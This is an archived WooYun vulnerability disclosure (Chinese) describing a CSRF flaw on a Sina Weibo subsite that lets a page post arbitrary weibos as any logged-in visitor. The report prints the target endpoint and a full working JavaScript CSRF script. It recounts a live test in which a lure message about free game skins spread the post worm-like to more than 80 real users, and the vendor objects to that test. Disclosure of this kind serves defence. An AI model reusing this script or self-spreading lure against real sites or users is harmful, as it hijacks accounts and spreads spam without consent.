新浪微博CSRF劫持发送任意微博 | wooyun-2014-065761| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-065761

漏洞标题：新浪微博CSRF劫持发送任意微博

漏洞作者： phith0n

提交时间：2014-06-21 19:34

修复时间：2014-08-05 19:36

公开时间：2014-08-05 19:36

漏洞类型：CSRF

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-06-21：细节已通知厂商并且等待厂商处理中
2014-06-21：厂商已经确认，细节仅向厂商公开
2014-07-01：细节向核心白帽子及相关领域专家公开
2014-07-11：细节向普通白帽子公开
2014-07-21：细节向实习白帽子公开
2014-08-05：细节向公众公开

简要描述：

几分钟，刷了不少微博~影响很大！感谢 @z7y 表哥帮我测试~

详细说明：

新浪微博某分站对发表微博验证不严，导致可以CSRF发表微博。
方法是向 http://ka.weibo.com/index.php/request/send/9392 POST数据status=test，即可发送一条微博，内容是test。
我在这里写好了一个脚本，只要放在流量大的网站上，很快就能发送很多。然后我在里面加了个@phithon，这样每当受害者发送一次微博的时候，就会@我，我就能看到很多很多受影响的微博用户。
用户访问如下页面：http://www.leavesongs.com/other/weibo.html
就会中招。
以下是CSRF脚本：

gum=function(){var b={version:"1140213",domain:"{{domain}}",backinfo:{},e:function(a){try{return eval(a)}catch(b){return""}},jquery:function(){return b.e("$().jquery")?1:0},id:function(a){return b.jquery()?$("#"+a):document.getElementById(a)},name:function(a){return document.getElementsByTagName(a)},html:function(){return b.name("html")[0]||document.write("<html>")||b.name("html")[0]},rdm:function(){return 1E5*Math.random()},bind:function(a,c,e){b.jquery()?$(a).bind(c,e):a.addEventListener?a.addEventListener(c,
e,!1):a.attachEvent("on"+c,e)},kill:function(a){b.jquery()?$(a).remove():a.parentElement.removeChild(a)},addom:function(a,c,e,d){!c&&(c=b.html());var f=document.createElement("span");f.innerHTML=a;a=f.children[0];e&&(a.style.display="none");d&&b.bind(a,"load",d);c.appendChild(a);return a},script:function(a,c){b.jquery()?$.getScript(a,c):(document.documentElement.appendChild(scripts=document.createElement("script")).src=a,c&&b.bind(scripts,"load",c),b.kill(scripts))},ajax:function(a,c,e){var d;c?types=
"POST":types="GET";b.jquery()?d=$.ajax({type:types,url:a,data:c,success:e}):(d=window.XMLHttpRequest?new XMLHttpRequest:new ActiveXObject("Microsoft.XMLHTTP"),d.open(types,a,!1),"POST"==types&&d.setRequestHeader("content-type","application/x-www-form-urlencoded"),e&&(d.onreadystatechange=function(){4==this.readyState&&(200<=this.status&&300>=this.status||304==this.status)&&e.apply(this,arguments)}),d.send(c));return d},post:function(a,c,e,d){var f=b.addom("<form method='POST'>",b.html(),!0);f.action=
a;for(var g in c)a=document.createElement("input"),a.name=g,a.value=c[g],f.appendChild(a);if(!e){var h=b.addom("<iframe sandbox name=_"+b.rdm()+"_>",b.html(),!0);f.target=h.name}d&&b.bind(f,"submit",d);f.submit();!e&&b.kill(f)&setTimeout(function(){b.kill(h)},3E3)}};return b}();
gum.post('http://ka.weibo.com/index.php/request/send/9392', {
    'status': '测试微博 by @phithon'
});

漏洞证明：

z7y表哥帮我测试了一下，发送了一条微博：

@phithon http://t.cn/RvlqyJw 腾讯LOL活动大礼,上百款皮肤随便抽,不拿白不拿！@z7y_

用诱惑性的语句诱导用户点击我们的链接，链接中嵌入js，这样就能让用户不知不觉中发送同上的一条微博。再次通过受害者的微博传播，然后受害的用户就会成倍增长，最后达到可怕的数目。
我们只测试了十几分钟，就有80多个用户中招了，后来就把页面关了。
受害用户如下：

如果我发的是广告或不好的页面，影响极坏。求加精呀~~嘿嘿，也算CSRF蠕虫了吧？

修复方案：

验证。

版权声明：转载请注明来源 phith0n@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2014-06-21 22:06

厂商回复：

在分析漏洞时，请不要有攻击破坏他人微博的行为，以免有用户投诉或者违法。感谢关注新浪安全。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-065761

漏洞标题：新浪微博CSRF劫持发送任意微博

相关厂商：新浪微博

漏洞作者： phith0n

提交时间：2014-06-21 19:34

修复时间：2014-08-05 19:36

公开时间：2014-08-05 19:36

漏洞类型：CSRF

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 phith0n@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-065761

漏洞标题：新浪微博CSRF劫持发送任意微博

相关厂商：新浪微博

漏洞作者： phith0n

提交时间：2014-06-21 19:34

修复时间：2014-08-05 19:36

公开时间：2014-08-05 19:36

漏洞类型：CSRF

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-065761"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 phith0n@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：